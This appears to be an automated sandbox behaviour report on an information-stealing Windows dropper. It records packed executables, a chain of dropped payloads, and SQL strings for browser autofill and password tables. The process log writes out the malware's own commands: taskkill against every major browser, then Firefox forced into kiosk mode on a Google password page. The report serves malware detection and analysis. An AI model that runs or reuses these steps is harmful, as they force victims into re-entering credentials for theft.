Source: file.exe, 00000000.00000003.2315867190.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316541745.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315154993.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318262366.00000000058A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299412323.000000000594E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318824120.00000000059DF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319627971.00000000059D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301881249.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319761262.0000000005B18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305379281.0000000005962000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315703983.00000000059C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316964249.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317313180.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314769491.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314440329.00000000058A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301692963.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313137854.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313672557.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310667303.0000000005A50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319216768.00000000059E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310397804.000000000597F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320621767.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313441326.0000000005985000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301587395.000000000595D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314141083.000000000599C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316678110.00000000059BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330727859.0000000005DF4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311380261.0000000005A4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319493526.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297858315.00000000058B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318121775.00000000059C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314553440.0000000005997000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313920539.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316002519.00000000059B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315006842.0000000005AA0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315431935.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297781995.0000000005704000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300177986.00000000058AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297997212.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302564934.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299255200.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2303668328.0000000005969000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316142750.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320789721.00000000059FF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310002624.00000000058B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301488223.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311759056.0000000005985000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302852436.000000000595A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315302824.00000000059A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317983569.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313812274.000000000598D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301794711.000000000595D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299082640.00000000058B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304183167.00000000058A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311543690.00000000058AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297921910.0000000005709000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302475747.000000000595D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302757448.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311209473.0000000005979000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301394257.00000000059F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300688784.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316404816.00000000059B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316810819.0000000005AD7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317828945.00000000059C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318403942.00000000059CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336003627.0000000005336000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316251244.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320193834.00000000058A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2298999465.0000000005707000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2298906336.00000000058AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314031874.00000000058AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299171124.0000000005945000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302941014.0000000005A16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300578904.000000000595A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: Section: ZLIB complexity 0.9977009536784741
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: Section: qodksccb ZLIB complexity 0.9945776126305862
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9977009536784741
Source: skotes.exe.4.dr Static PE information: Section: qodksccb ZLIB complexity 0.9945776126305862
Source: random[1].exe.5.dr Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: efe6fe4127.exe.5.dr Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: random[1].exe0.5.dr Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
Source: b76bb5cee7.exe.5.dr Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: Section: ZLIB complexity 0.9977009536784741
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: Section: qodksccb ZLIB complexity 0.9945776126305862
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.4.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@82/26@100/14
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_04B715D0 ChangeServiceConfigA, 3_2_04B715D0
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YQEN9A9QU4P1VROBPV5YS.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofill;H&&
Source: file.exe, 00000000.00000003.2159282380.00000000052F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175481381.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159535647.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174842839.00000000052F6000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2662978061.0000000005703000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2648842330.000000000570E000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2662787752.000000000570E000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649818466.00000000056DF000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2820465391.00000000062EE000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2817353634.00000000061E7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2797807955.00000000062C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: YQEN9A9QU4P1VROBPV5YS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: YQEN9A9QU4P1VROBPV5YS.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe "C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe "C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe"
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {423ea620-fe66-413c-8935-40f62b63c251} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e3236e310 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe "C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe "C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -parentBuildID 20230927232528 -prefsHandle 4284 -prefMapHandle 4008 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f1378f9-151b-4458-be92-e8615185ef25} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e448f6d10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
